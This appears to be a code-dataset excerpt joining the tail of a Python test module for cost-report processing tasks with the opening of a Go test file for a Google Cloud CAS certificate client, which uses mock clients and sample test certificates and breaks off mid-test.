{"table_options": "{}", "expected": {}},
{"table_options": {"foo": "bar"}, "expected": {"foo": "bar"}},
]
for test in test_matrix:
self.assertEquals(normalize_table_options(test.get("table_options")), test.get("expected"))
@patch("masu.processor.tasks.ReportStatsDBAccessor.get_last_completed_datetime")
def test_record_report_status(self, mock_accessor):
mock_accessor.return_value = True
manifest_id = 1
file_name = "testfile.csv"
request_id = 3
already_processed = record_report_status(manifest_id, file_name, request_id)
self.assertTrue(already_processed)
mock_accessor.return_value = False
already_processed = record_report_status(manifest_id, file_name, request_id)
self.assertFalse(already_processed)
def test_record_all_manifest_files(self):
"""Test that file list is saved in ReportStatsDBAccessor."""
files_list = ["file1.csv", "file2.csv", "file3.csv"]
manifest_id = 1
tracing_id = "1234"
record_all_manifest_files(manifest_id, files_list, tracing_id)
for report_file in files_list:
CostUsageReportStatus.objects.filter(report_name=report_file).exists()
def test_record_all_manifest_files_concurrent_writes(self):
"""Test that file list is saved in ReportStatsDBAccessor race condition."""
files_list = ["file1.csv", "file2.csv", "file3.csv"]
manifest_id = 1
tracing_id = "1234"
record_all_manifest_files(manifest_id, files_list, tracing_id)
with patch.object(ReportStatsDBAccessor, "does_db_entry_exist", return_value=False):
with patch.object(ReportStatsDBAccessor, "add", side_effect=IntegrityError):
record_all_manifest_files(manifest_id, files_list, tracing_id)
for report_file in files_list:
CostUsageReportStatus.objects.filter(report_name=report_file).exists()
class TestWorkerCacheThrottling(MasuTestCase):
"""Tests for tasks that use the worker cache."""
def single_task_is_running(self, task_name, task_args=None):
"""Check for a single task key in the cache."""
cache = caches["worker"]
cache_str = create_single_task_cache_key(task_name, task_args)
return True if cache.get(cache_str) else False
def lock_single_task(self, task_name, task_args=None, timeout=None):
"""Add a cache entry for a single task to lock a specific task."""
cache = caches["worker"]
cache_str = create_single_task_cache_key(task_name, task_args)
cache.add(cache_str, "true", 3)
@patch("masu.processor.tasks.update_summary_tables.s")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_summary_tables")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_daily_tables")
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.refresh_materialized_views")
@patch("masu.processor.tasks.update_cost_model_costs")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_update_summary_tables_worker_throttled(
self,
mock_inspect,
mock_lock,
mock_release,
mock_update_cost,
mock_refresh,
mock_chain,
mock_daily,
mock_summary,
mock_delay,
):
"""Test that the worker cache is used."""
task_name = "masu.processor.tasks.update_summary_tables"
cache_args = [self.schema, Provider.PROVIDER_AWS]
mock_lock.side_effect = self.lock_single_task
start_date = DateHelper().this_month_start
end_date = DateHelper().this_month_end
mock_daily.return_value = start_date, end_date
mock_summary.return_value = start_date, end_date
update_summary_tables(self.schema, Provider.PROVIDER_AWS, self.aws_provider_uuid, start_date, end_date)
mock_delay.assert_not_called()
update_summary_tables(self.schema, Provider.PROVIDER_AWS, self.aws_provider_uuid, start_date, end_date)
mock_delay.assert_called()
self.assertTrue(self.single_task_is_running(task_name, cache_args))
# Let the cache entry expire
time.sleep(3)
self.assertFalse(self.single_task_is_running(task_name, cache_args))
@patch("masu.processor.tasks.update_summary_tables.s")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_summary_tables")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_daily_tables")
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.refresh_materialized_views")
@patch("masu.processor.tasks.update_cost_model_costs")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_update_summary_tables_worker_error(
self,
mock_inspect,
mock_lock,
mock_release,
mock_update_cost,
mock_refresh,
mock_chain,
mock_daily,
mock_summary,
mock_delay,
):
"""Test that the worker cache is used."""
task_name = "masu.processor.tasks.update_summary_tables"
cache_args = [self.schema]
start_date = DateHelper().this_month_start
end_date = DateHelper().this_month_end
mock_daily.return_value = start_date, end_date
mock_summary.side_effect = ReportProcessorError
with self.assertRaises(ReportProcessorError):
update_summary_tables(self.schema, Provider.PROVIDER_AWS, self.aws_provider_uuid, start_date, end_date)
mock_delay.assert_not_called()
self.assertFalse(self.single_task_is_running(task_name, cache_args))
@patch("masu.processor.tasks.update_summary_tables.s")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_summary_tables")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_daily_tables")
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.refresh_materialized_views")
@patch("masu.processor.tasks.update_cost_model_costs")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_update_summary_tables_cloud_summary_error(
self,
mock_inspect,
mock_lock,
mock_release,
mock_update_cost,
mock_refresh,
mock_chain,
mock_daily,
mock_summary,
mock_delay,
):
"""Test that the update_summary_table cloud exception is caught."""
start_date = DateHelper().this_month_start
end_date = DateHelper().this_month_end
mock_daily.return_value = start_date, end_date
mock_summary.side_effect = ReportSummaryUpdaterCloudError
expected = "Failed to correlate"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
update_summary_tables(self.schema, Provider.PROVIDER_AWS, self.aws_provider_uuid, start_date, end_date)
statement_found = False
for log in logger.output:
if expected in log:
statement_found = True
self.assertTrue(statement_found)
@patch("masu.processor.tasks.update_summary_tables.s")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_summary_tables")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_daily_tables")
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.refresh_materialized_views")
@patch("masu.processor.tasks.update_cost_model_costs")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_update_summary_tables_provider_not_found_error(
self,
mock_inspect,
mock_lock,
mock_release,
mock_update_cost,
mock_refresh,
mock_chain,
mock_daily,
mock_summary,
mock_delay,
):
"""Test that the update_summary_table provider not found exception is caught."""
start_date = DateHelper().this_month_start
end_date = DateHelper().this_month_end
mock_daily.return_value = start_date, end_date
mock_summary.side_effect = ReportSummaryUpdaterProviderNotFoundError
expected = "Processing for this provier will halt."
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
update_summary_tables(self.schema, Provider.PROVIDER_AWS, uuid4(), start_date, end_date)
statement_found = False
for log in logger.output:
if expected in log:
statement_found = True
break
self.assertTrue(statement_found)
@skip("cost model calcs are taking longer with the conversion to partables. This test needs a rethink.")
@patch("masu.processor.tasks.update_cost_model_costs.s")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_update_cost_model_costs_throttled(self, mock_inspect, mock_lock, mock_release, mock_delay):
"""Test that refresh materialized views runs with cache lock."""
mock_lock.side_effect = self.lock_single_task
start_date = DateHelper().last_month_start - relativedelta.relativedelta(months=1)
end_date = DateHelper().today
expected_start_date = start_date.strftime("%Y-%m-%d")
expected_end_date = end_date.strftime("%Y-%m-%d")
task_name = "masu.processor.tasks.update_cost_model_costs"
cache_args = [self.schema, self.aws_provider_uuid, expected_start_date, expected_end_date]
manifest_dict = {
"assembly_id": "12345",
"billing_period_start_datetime": DateHelper().today,
"num_total_files": 2,
"provider_uuid": self.aws_provider_uuid,
}
with ReportManifestDBAccessor() as manifest_accessor:
manifest = manifest_accessor.add(**manifest_dict)
manifest.save()
update_cost_model_costs(self.schema, self.aws_provider_uuid, expected_start_date, expected_end_date)
mock_delay.assert_not_called()
update_cost_model_costs(self.schema, self.aws_provider_uuid, expected_start_date, expected_end_date)
mock_delay.assert_called()
self.assertTrue(self.single_task_is_running(task_name, cache_args))
# Let the cache entry expire
time.sleep(3)
self.assertFalse(self.single_task_is_running(task_name, cache_args))
@patch("masu.processor.tasks.CostModelCostUpdater")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_update_cost_model_costs_error(self, mock_inspect, mock_lock, mock_release, mock_updater):
"""Test that refresh materialized views runs with cache lock."""
start_date = DateHelper().last_month_start - relativedelta.relativedelta(months=1)
end_date = DateHelper().today
expected_start_date = start_date.strftime("%Y-%m-%d")
expected_end_date = end_date.strftime("%Y-%m-%d")
task_name = "masu.processor.tasks.update_cost_model_costs"
cache_args = [self.schema, self.aws_provider_uuid, expected_start_date, expected_end_date]
mock_updater.side_effect = ReportProcessorError
with self.assertRaises(ReportProcessorError):
update_cost_model_costs(self.schema, self.aws_provider_uuid, expected_start_date, expected_end_date)
self.assertFalse(self.single_task_is_running(task_name, cache_args))
@patch("masu.processor.tasks.refresh_materialized_views.s")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_refresh_materialized_views_throttled(self, mock_inspect, mock_lock, mock_release, mock_delay):
"""Test that refresh materialized views runs with cache lock."""
mock_lock.side_effect = self.lock_single_task
task_name = "masu.processor.tasks.refresh_materialized_views"
cache_args = [self.schema, Provider.PROVIDER_AWS]
manifest_dict = {
"assembly_id": "12345",
"billing_period_start_datetime": DateHelper().today,
"num_total_files": 2,
"provider_uuid": self.aws_provider_uuid,
}
with ReportManifestDBAccessor() as manifest_accessor:
manifest = manifest_accessor.add(**manifest_dict)
manifest.save()
refresh_materialized_views(self.schema, Provider.PROVIDER_AWS, manifest_id=manifest.id)
mock_delay.assert_not_called()
refresh_materialized_views(self.schema, Provider.PROVIDER_AWS, manifest_id=manifest.id)
refresh_materialized_views(self.schema, Provider.PROVIDER_AWS, manifest_id=manifest.id)
mock_delay.assert_called()
self.assertTrue(self.single_task_is_running(task_name, cache_args))
# Let the cache entry expire
time.sleep(3)
self.assertFalse(self.single_task_is_running(task_name, cache_args))
class TestRemoveStaleTenants(MasuTestCase):
def setUp(self):
"""Set up middleware tests."""
super().setUp()
request = self.request_context["request"]
request.path = "/api/v1/tags/aws/"
def test_remove_stale_tenant(self):
"""Test removal of stale tenants that are older than two weeks"""
days = 14
initial_date_updated = self.customer.date_updated
self.assertIsNotNone(initial_date_updated)
with schema_context("public"):
mock_request = self.request_context["request"]
middleware = KokuTenantMiddleware()
middleware.get_tenant(Tenant, "localhost", mock_request)
self.assertNotEquals(KokuTenantMiddleware.tenant_cache.currsize, 0)
remove_stale_tenants() # Check that it is not clearing the cache unless removing
self.assertNotEquals(KokuTenantMiddleware.tenant_cache.currsize, 0)
self.customer.date_updated = DateHelper().n_days_ago(self.customer.date_updated, days)
self.customer.save()
before_len = Tenant.objects.count()
remove_stale_tenants()
after_len = Tenant.objects.count()
self.assertGreater(before_len, after_len)
self.assertEquals(KokuTenantMiddleware.tenant_cache.currsize, 0)
| []
| []
| [
"AUTOVACUUM_TUNING"
]
| [] | ["AUTOVACUUM_TUNING"] | python | 1 | 0 | |
cas/cloudcas/cloudcas_test.go | package cloudcas
import (
"bytes"
"context"
"crypto/rand"
"crypto/x509"
"encoding/asn1"
"io"
"os"
"reflect"
"testing"
"time"
"github.com/google/uuid"
gax "github.com/googleapis/gax-go/v2"
"github.com/pkg/errors"
"github.com/smallstep/certificates/cas/apiv1"
pb "google.golang.org/genproto/googleapis/cloud/security/privateca/v1beta1"
)
var (
errTest = errors.New("test error")
testAuthorityName = "projects/test-project/locations/us-west1/certificateAuthorities/test-ca"
testCertificateName = "projects/test-project/locations/us-west1/certificateAuthorities/test-ca/certificates/test-certificate"
testRootCertificate = `-----BEGIN CERTIFICATE-----
MIIBhjCCAS2gAwIBAgIQLbKTuXau4+t3KFbGpJJAADAKBggqhkjOPQQDAjAiMSAw
HgYDVQQDExdHb29nbGUgQ0FTIFRlc3QgUm9vdCBDQTAeFw0yMDA5MTQyMjQ4NDla
Fw0zMDA5MTIyMjQ4NDlaMCIxIDAeBgNVBAMTF0dvb2dsZSBDQVMgVGVzdCBSb290
IENBMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEYKGgQ3/0D7+oBTc0CXoYfSC6
M8hOqLsmzBapPZSYpfwjgEsjdNU84jdrYmW1zF1+p+MrL4c7qJv9NLo/picCuqNF
MEMwDgYDVR0PAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYBAf8CAQEwHQYDVR0OBBYE
FFVn9V7Qymd7cUJh9KAhnUDAQL5YMAoGCCqGSM49BAMCA0cAMEQCIA4LzttYoT3u
8TYgSrvFT+Z+cklfi4UrPBU6aSbcUaW2AiAPfaqbyccQT3CxMVyHg+xZZjAirZp8
lAeA/T4FxAonHA==
-----END CERTIFICATE-----`
testIntermediateCertificate = `-----BEGIN CERTIFICATE-----
MIIBsDCCAVagAwIBAgIQOb91kHxWKVzSJ9ESW1ViVzAKBggqhkjOPQQDAjAiMSAw
HgYDVQQDExdHb29nbGUgQ0FTIFRlc3QgUm9vdCBDQTAeFw0yMDA5MTQyMjQ4NDla
Fw0zMDA5MTIyMjQ4NDlaMCoxKDAmBgNVBAMTH0dvb2dsZSBDQVMgVGVzdCBJbnRl
cm1lZGlhdGUgQ0EwWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAASUHN1cNyId4Ei/
4MxD5VrZFc51P50caMUdDZVrPveidChBYCU/9IM6vnRlZHx2HLjQ0qAvqHwY3rT0
xc7n+PfCo2YwZDAOBgNVHQ8BAf8EBAMCAQYwEgYDVR0TAQH/BAgwBgEB/wIBADAd
BgNVHQ4EFgQUSDlasiw0pRKyS7llhL0ZuVFNa9UwHwYDVR0jBBgwFoAUVWf1XtDK
Z3txQmH0oCGdQMBAvlgwCgYIKoZIzj0EAwIDSAAwRQIgMmsLcoC4KriXw+s+cZx2
bJMf6Mx/WESj31buJJhpzY0CIQCBUa/JtvS3nyce/4DF5tK2v49/NWHREgqAaZ57
DcYyHQ==
-----END CERTIFICATE-----`
testLeafCertificate = `-----BEGIN CERTIFICATE-----
MIIB1jCCAX2gAwIBAgIQQfOn+COMeuD8VYF1TiDkEzAKBggqhkjOPQQDAjAqMSgw
JgYDVQQDEx9Hb29nbGUgQ0FTIFRlc3QgSW50ZXJtZWRpYXRlIENBMB4XDTIwMDkx
NDIyNTE1NVoXDTMwMDkxMjIyNTE1MlowHTEbMBkGA1UEAxMSdGVzdC5zbWFsbHN0
ZXAuY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEAdUSRBrpgHFilN4eaGlN
nX2+xfjXa1Iwk2/+AensjFTXJi1UAIB0e+4pqi7Sen5E2QVBhntEHCrA3xOf7czg
P6OBkTCBjjAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsG
AQUFBwMCMB0GA1UdDgQWBBSYPbu4Tmm7Zze/hCePeZH1Avoj+jAfBgNVHSMEGDAW
gBRIOVqyLDSlErJLuWWEvRm5UU1r1TAdBgNVHREEFjAUghJ0ZXN0LnNtYWxsc3Rl
cC5jb20wCgYIKoZIzj0EAwIDRwAwRAIgY+nTc+RHn31/BOhht4JpxCmJPHxqFT3S
ojnictBudV0CIB87ipY5HV3c8FLVEzTA0wFwdDZvQraQYsthwbg2kQFb
-----END CERTIFICATE-----`
testSignedCertificate = `-----BEGIN CERTIFICATE-----
MIIB/DCCAaKgAwIBAgIQHHFuGMz0cClfde5kqP5prTAKBggqhkjOPQQDAjAqMSgw
JgYDVQQDEx9Hb29nbGUgQ0FTIFRlc3QgSW50ZXJtZWRpYXRlIENBMB4XDTIwMDkx
NTAwMDQ0M1oXDTMwMDkxMzAwMDQ0MFowHTEbMBkGA1UEAxMSdGVzdC5zbWFsbHN0
ZXAuY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMqNCiXMvbn74LsHzRv+8
17m9vEzH6RHrg3m82e0uEc36+fZWV/zJ9SKuONmnl5VP79LsjL5SVH0RDj73U2XO
DKOBtjCBszAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsG
AQUFBwMCMB0GA1UdDgQWBBRTA2cTs7PCNjnps/+T0dS8diqv0DAfBgNVHSMEGDAW
gBRIOVqyLDSlErJLuWWEvRm5UU1r1TBCBgwrBgEEAYKkZMYoQAIEMjAwEwhjbG91
ZGNhcxMkZDhkMThhNjgtNTI5Ni00YWYzLWFlNGItMmY4NzdkYTNmYmQ5MAoGCCqG
SM49BAMCA0gAMEUCIGxl+pqJ50WYWUqK2l4V1FHoXSi0Nht5kwTxFxnWZu1xAiEA
zemu3bhWLFaGg3s8i+HTEhw4RqkHP74vF7AVYp88bAw=
-----END CERTIFICATE-----`
)
type testClient struct {
credentialsFile string
certificate *pb.Certificate
certificateAuthority *pb.CertificateAuthority
err error
}
func newTestClient(credentialsFile string) (CertificateAuthorityClient, error) {
if credentialsFile == "testdata/error.json" {
return nil, errTest
}
return &testClient{
credentialsFile: credentialsFile,
}, nil
}
func okTestClient() *testClient {
return &testClient{
credentialsFile: "testdata/credentials.json",
certificate: &pb.Certificate{
Name: testCertificateName,
PemCertificate: testSignedCertificate,
PemCertificateChain: []string{testIntermediateCertificate, testRootCertificate},
},
certificateAuthority: &pb.CertificateAuthority{
PemCaCertificates: []string{testIntermediateCertificate, testRootCertificate},
},
}
}
func failTestClient() *testClient {
return &testClient{
credentialsFile: "testdata/credentials.json",
err: errTest,
}
}
func badTestClient() *testClient {
return &testClient{
credentialsFile: "testdata/credentials.json",
certificate: &pb.Certificate{
Name: testCertificateName,
PemCertificate: "not a pem cert",
PemCertificateChain: []string{testIntermediateCertificate, testRootCertificate},
},
certificateAuthority: &pb.CertificateAuthority{
PemCaCertificates: []string{testIntermediateCertificate, "not a pem cert"},
},
}
}
func setTeeReader(t *testing.T, w *bytes.Buffer) {
t.Helper()
reader := rand.Reader
t.Cleanup(func() {
rand.Reader = reader
})
rand.Reader = io.TeeReader(reader, w)
}
func (c *testClient) CreateCertificate(ctx context.Context, req *pb.CreateCertificateRequest, opts ...gax.CallOption) (*pb.Certificate, error) {
return c.certificate, c.err
}
func (c *testClient) RevokeCertificate(ctx context.Context, req *pb.RevokeCertificateRequest, opts ...gax.CallOption) (*pb.Certificate, error) {
return c.certificate, c.err
}
func (c *testClient) GetCertificateAuthority(ctx context.Context, req *pb.GetCertificateAuthorityRequest, opts ...gax.CallOption) (*pb.CertificateAuthority, error) {
return c.certificateAuthority, c.err
}
func mustParseCertificate(t *testing.T, pemCert string) *x509.Certificate {
t.Helper()
crt, err := parseCertificate(pemCert)
if err != nil {
t.Fatal(err)
}
return crt
}
func TestNew(t *testing.T) {
tmp := newCertificateAuthorityClient
newCertificateAuthorityClient = func(ctx context.Context, credentialsFile string) (CertificateAuthorityClient, error) {
return newTestClient(credentialsFile)
}
t.Cleanup(func() {
newCertificateAuthorityClient = tmp
})
type args struct {
ctx context.Context
opts apiv1.Options
}
tests := []struct {
name string
args args
want *CloudCAS
wantErr bool
}{
{"ok", args{context.Background(), apiv1.Options{
CertificateAuthority: testAuthorityName,
}}, &CloudCAS{
client: &testClient{},
certificateAuthority: testAuthorityName,
}, false},
{"ok with credentials", args{context.Background(), apiv1.Options{
CertificateAuthority: testAuthorityName, CredentialsFile: "testdata/credentials.json",
}}, &CloudCAS{
client: &testClient{credentialsFile: "testdata/credentials.json"},
certificateAuthority: testAuthorityName,
}, false},
{"fail certificate authority", args{context.Background(), apiv1.Options{}}, nil, true},
{"fail with credentials", args{context.Background(), apiv1.Options{
CertificateAuthority: testAuthorityName, CredentialsFile: "testdata/error.json",
}}, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got, err := New(tt.args.ctx, tt.args.opts)
if (err != nil) != tt.wantErr {
t.Errorf("New() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("New() = %v, want %v", got, tt.want)
}
})
}
}
func TestNew_register(t *testing.T) {
tmp := newCertificateAuthorityClient
newCertificateAuthorityClient = func(ctx context.Context, credentialsFile string) (CertificateAuthorityClient, error) {
return newTestClient(credentialsFile)
}
t.Cleanup(func() {
newCertificateAuthorityClient = tmp
})
want := &CloudCAS{
client: &testClient{credentialsFile: "testdata/credentials.json"},
certificateAuthority: testAuthorityName,
}
newFn, ok := apiv1.LoadCertificateAuthorityServiceNewFunc(apiv1.CloudCAS)
if !ok {
t.Error("apiv1.LoadCertificateAuthorityServiceNewFunc(apiv1.CloudCAS) was not found")
return
}
got, err := newFn(context.Background(), apiv1.Options{
CertificateAuthority: testAuthorityName, CredentialsFile: "testdata/credentials.json",
})
if err != nil {
t.Errorf("New() error = %v", err)
return
}
if !reflect.DeepEqual(got, want) {
t.Errorf("New() = %v, want %v", got, want)
}
}
func TestNew_real(t *testing.T) {
if v, ok := os.LookupEnv("GOOGLE_APPLICATION_CREDENTIALS"); ok {
os.Unsetenv("GOOGLE_APPLICATION_CREDENTIALS")
t.Cleanup(func() {
os.Setenv("GOOGLE_APPLICATION_CREDENTIALS", v)
})
}
type args struct {
ctx context.Context
opts apiv1.Options
}
tests := []struct {
name string
skipOnCI bool
args args
wantErr bool
}{
{"fail default credentials", true, args{context.Background(), apiv1.Options{CertificateAuthority: testAuthorityName}}, true},
{"fail certificate authority", false, args{context.Background(), apiv1.Options{}}, true},
{"fail with credentials", false, args{context.Background(), apiv1.Options{
CertificateAuthority: testAuthorityName, CredentialsFile: "testdata/missing.json",
}}, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if tt.skipOnCI && os.Getenv("CI") == "true" {
t.SkipNow()
}
_, err := New(tt.args.ctx, tt.args.opts)
if (err != nil) != tt.wantErr {
t.Errorf("New() error = %v, wantErr %v", err, tt.wantErr)
}
})
}
}
func TestCloudCAS_GetCertificateAuthority(t *testing.T) {
root := mustParseCertificate(t, testRootCertificate)
type fields struct {
client CertificateAuthorityClient
certificateAuthority string
}
type args struct {
req *apiv1.GetCertificateAuthorityRequest
}
tests := []struct {
name string
fields fields
args args
want *apiv1.GetCertificateAuthorityResponse
wantErr bool
}{
{"ok", fields{okTestClient(), testCertificateName}, args{&apiv1.GetCertificateAuthorityRequest{}}, &apiv1.GetCertificateAuthorityResponse{
RootCertificate: root,
}, false},
{"ok with name", fields{okTestClient(), testCertificateName}, args{&apiv1.GetCertificateAuthorityRequest{
Name: testCertificateName,
}}, &apiv1.GetCertificateAuthorityResponse{
RootCertificate: root,
}, false},
{"fail GetCertificateAuthority", fields{failTestClient(), testCertificateName}, args{&apiv1.GetCertificateAuthorityRequest{}}, nil, true},
{"fail bad root", fields{badTestClient(), testCertificateName}, args{&apiv1.GetCertificateAuthorityRequest{}}, nil, true},
{"fail no pems", fields{&testClient{certificateAuthority: &pb.CertificateAuthority{}}, testCertificateName}, args{&apiv1.GetCertificateAuthorityRequest{}}, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
c := &CloudCAS{
client: tt.fields.client,
certificateAuthority: tt.fields.certificateAuthority,
}
got, err := c.GetCertificateAuthority(tt.args.req)
if (err != nil) != tt.wantErr {
t.Errorf("CloudCAS.GetCertificateAuthority() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("CloudCAS.GetCertificateAuthority() = %v, want %v", got, tt.want)
}
})
}
}
func TestCloudCAS_CreateCertificate(t *testing.T) {
type fields struct {
client CertificateAuthorityClient
certificateAuthority string
}
type args struct {
req *apiv1.CreateCertificateRequest
}
tests := []struct {
name string
fields fields
args args
want *apiv1.CreateCertificateResponse
wantErr bool
}{
{"ok", fields{okTestClient(), testCertificateName}, args{&apiv1.CreateCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
Lifetime: 24 * time.Hour,
}}, &apiv1.CreateCertificateResponse{
Certificate: mustParseCertificate(t, testSignedCertificate),
CertificateChain: []*x509.Certificate{mustParseCertificate(t, testIntermediateCertificate)},
}, false},
{"fail Template", fields{okTestClient(), testCertificateName}, args{&apiv1.CreateCertificateRequest{
Lifetime: 24 * time.Hour,
}}, nil, true},
{"fail Lifetime", fields{okTestClient(), testCertificateName}, args{&apiv1.CreateCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
}}, nil, true},
{"fail CreateCertificate", fields{failTestClient(), testCertificateName}, args{&apiv1.CreateCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
Lifetime: 24 * time.Hour,
}}, nil, true},
{"fail Certificate", fields{badTestClient(), testCertificateName}, args{&apiv1.CreateCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
Lifetime: 24 * time.Hour,
}}, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
c := &CloudCAS{
client: tt.fields.client,
certificateAuthority: tt.fields.certificateAuthority,
}
got, err := c.CreateCertificate(tt.args.req)
if (err != nil) != tt.wantErr {
t.Errorf("CloudCAS.CreateCertificate() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("CloudCAS.CreateCertificate() = %v, want %v", got, tt.want)
}
})
}
}
func TestCloudCAS_createCertificate(t *testing.T) {
leaf := mustParseCertificate(t, testLeafCertificate)
signed := mustParseCertificate(t, testSignedCertificate)
chain := []*x509.Certificate{mustParseCertificate(t, testIntermediateCertificate)}
type fields struct {
client CertificateAuthorityClient
certificateAuthority string
}
type args struct {
tpl *x509.Certificate
lifetime time.Duration
requestID string
}
tests := []struct {
name string
fields fields
args args
want *x509.Certificate
want1 []*x509.Certificate
wantErr bool
}{
{"ok", fields{okTestClient(), testAuthorityName}, args{leaf, 24 * time.Hour, "request-id"}, signed, chain, false},
{"fail CertificateConfig", fields{okTestClient(), testAuthorityName}, args{&x509.Certificate{}, 24 * time.Hour, "request-id"}, nil, nil, true},
{"fail CreateCertificate", fields{failTestClient(), testAuthorityName}, args{leaf, 24 * time.Hour, "request-id"}, nil, nil, true},
{"fail ParseCertificates", fields{badTestClient(), testAuthorityName}, args{leaf, 24 * time.Hour, "request-id"}, nil, nil, true},
{"fail create id", fields{okTestClient(), testAuthorityName}, args{leaf, 24 * time.Hour, "request-id"}, nil, nil, true},
}
// Pre-calculate rand.Random
buf := new(bytes.Buffer)
setTeeReader(t, buf)
for i := 0; i < len(tests)-1; i++ {
_, err := uuid.NewRandomFromReader(rand.Reader)
if err != nil {
t.Fatal(err)
}
}
rand.Reader = buf
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
c := &CloudCAS{
client: tt.fields.client,
certificateAuthority: tt.fields.certificateAuthority,
}
got, got1, err := c.createCertificate(tt.args.tpl, tt.args.lifetime, tt.args.requestID)
if (err != nil) != tt.wantErr {
t.Errorf("CloudCAS.createCertificate() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("CloudCAS.createCertificate() got = %v, want %v", got, tt.want)
}
if !reflect.DeepEqual(got1, tt.want1) {
t.Errorf("CloudCAS.createCertificate() got1 = %v, want %v", got1, tt.want1)
}
})
}
}
func TestCloudCAS_RenewCertificate(t *testing.T) {
type fields struct {
client CertificateAuthorityClient
certificateAuthority string
}
type args struct {
req *apiv1.RenewCertificateRequest
}
tests := []struct {
name string
fields fields
args args
want *apiv1.RenewCertificateResponse
wantErr bool
}{
{"ok", fields{okTestClient(), testCertificateName}, args{&apiv1.RenewCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
Lifetime: 24 * time.Hour,
}}, &apiv1.RenewCertificateResponse{
Certificate: mustParseCertificate(t, testSignedCertificate),
CertificateChain: []*x509.Certificate{mustParseCertificate(t, testIntermediateCertificate)},
}, false},
{"fail Template", fields{okTestClient(), testCertificateName}, args{&apiv1.RenewCertificateRequest{
Lifetime: 24 * time.Hour,
}}, nil, true},
{"fail Lifetime", fields{okTestClient(), testCertificateName}, args{&apiv1.RenewCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
}}, nil, true},
{"fail CreateCertificate", fields{failTestClient(), testCertificateName}, args{&apiv1.RenewCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
Lifetime: 24 * time.Hour,
}}, nil, true},
{"fail Certificate", fields{badTestClient(), testCertificateName}, args{&apiv1.RenewCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
Lifetime: 24 * time.Hour,
}}, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
c := &CloudCAS{
client: tt.fields.client,
certificateAuthority: tt.fields.certificateAuthority,
}
got, err := c.RenewCertificate(tt.args.req)
if (err != nil) != tt.wantErr {
t.Errorf("CloudCAS.RenewCertificate() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("CloudCAS.RenewCertificate() = %v, want %v", got, tt.want)
}
})
}
}
func TestCloudCAS_RevokeCertificate(t *testing.T) {
badExtensionCert := mustParseCertificate(t, testSignedCertificate)
for i, ext := range badExtensionCert.Extensions {
if ext.Id.Equal(asn1.ObjectIdentifier{1, 3, 6, 1, 4, 1, 37476, 9000, 64, 2}) {
badExtensionCert.Extensions[i].Value = []byte("bad-data")
}
}
type fields struct {
client CertificateAuthorityClient
certificateAuthority string
}
type args struct {
req *apiv1.RevokeCertificateRequest
}
tests := []struct {
name string
fields fields
args args
want *apiv1.RevokeCertificateResponse
wantErr bool
}{
